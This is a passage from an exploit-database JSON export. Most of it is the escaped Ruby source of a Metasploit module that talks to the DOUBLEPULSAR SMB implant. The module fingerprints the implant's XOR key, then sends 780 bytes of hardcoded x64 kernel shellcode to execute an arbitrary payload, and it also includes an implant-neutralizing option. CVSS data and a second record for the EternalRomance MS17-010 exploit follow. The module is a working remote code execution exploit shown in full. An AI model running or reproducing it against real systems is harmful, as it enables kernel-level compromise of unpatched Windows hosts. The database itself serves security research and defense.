\"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "8437845d202b2ebef5be3251e688af41"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "0bafb6325bcaf483a25404f785191cc5"}, {"key": "published", "hash": "0bafb6325bcaf483a25404f785191cc5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "e1c3e280f0f2e9b13489f95ca8e6aeea"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "scheme": null}, {"id": "EDB-ID:43970", "hash": "05b5c1df649bac2daf3cc809a79bf40c45ac84ca1c939a894a45ae0d2d4983a2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)", "description": "Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010). CVE-2017-0143,CVE-2017-0146,CVE-2017-0147. R...", "published": "2018-02-05T00:00:00", "modified": "2018-02-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/43970/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "lastseen": "2018-02-05T20:53:32", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010). CVE-2017-0143,CVE-2017-0146,CVE-2017-0147. R...", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-02-05T20:53:32", "references": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2018-02-05T20:53:32", "rev": 2, "value": 8.9, "vector": "NONE"}}, "hash": "18989856c3d339e3fddc25795127351f8deb8b7ac8944a0ac8ed05cb7ca913e8", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "78e989de00446befd491b80d94f241f6", "key": "description"}, {"hash": "2882fa4f749f1c5065df21f921150959", "key": "title"}, {"hash": "eaa4ed87336e2e51d149ce6e262dadbe", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "eaa4ed87336e2e51d149ce6e262dadbe", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "ced5a2b3b6df6c4dae430e5843571b2e", "key": "href"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}, {"hash": "e6f53676ca888a6a837a24417efa2477", "key": "cvelist"}], "history": [], "href": "https://www.exploit-db.com/exploits/43970/", "id": "EDB-ID:43970", "immutableFields": [], "lastseen": "2018-02-05T20:53:32", "modified": "2018-02-05T00:00:00", "objectVersion": "1.5", "published": "2018-02-05T00:00:00", "references": [], "reporter": "Exploit-DB", "title": "Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)", "type": "exploitdb", "viewCount": 234}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2018-02-05T20:53:32"}], "viewCount": 236, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96703", "SMNTC-96709"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147", "MS:CVE-2017-0146"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}], "modified": "2018-02-05T20:53:32", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": "2018-02-05T20:53:32", "rev": 2}}, "objectVersion": "1.5", 